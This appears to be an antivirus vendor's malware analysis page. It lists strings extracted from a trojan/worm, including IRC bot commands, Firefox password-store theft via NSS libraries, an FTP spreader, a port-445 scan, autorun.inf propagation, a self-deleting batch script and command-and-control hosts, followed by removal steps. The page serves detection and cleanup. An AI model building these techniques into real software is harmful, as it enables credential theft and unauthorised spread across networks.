Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
pipe\epmapper
\\%s\
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER TbT * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
https:/
http:/
csrss.exe
*!*@fbi.edu
||FTP||
jayne.p0rn-lover.us
rundat.exe
vids.p0rn-lover.us
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s Done @ (%iKB Sec)
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
%WinDir%\csrss.exe
193.138.244.231
192.168.220.133
231-ua-upclick.ipsystems.com.ua
||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 50 threads.
||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ooulnvm.exe:316
    AUE68.exe:464
    skype.exe:984
    skype.exe:444
    %original file name%.exe:1476
    %original file name%.exe:228
    msn.exe:1336
    msn.exe:204

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (116736 bytes)
    %Documents and Settings%\%current user%\G73A28.YX3 (92160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\X7VALIDZ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (12288 bytes)
    %WinDir%\skype.exe (530432 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\X7VALIDZ\1738599339.ms1[1] (530432 bytes)
    %Documents and Settings%\%current user%\Cookies\test@directxex[1].txt (118 bytes)
    %Documents and Settings%\%current user%\F26D\msn.exe (904976 bytes)
    %Documents and Settings%\All Users\svchost.exe (528384 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\AUE68.exe (757524 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %System%\ooulnvm.exe (771406 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (116736 bytes)
    %Documents and Settings%\%current user%\A85F69.MS5 (67072 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (68608 bytes)
    %WinDir%\csrss.exe (746376 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
    "Supports RAS Connections" = "ooulnvm.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Supports RAS Connections" = "ooulnvm.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Supports RAS Connections" = "ooulnvm.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
    "Supports RAS Connections" = "ooulnvm.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SunJavaUpdateSched" = "%Documents and Settings%\All Users\svchost.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Remote Registry Service" = "csrss.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.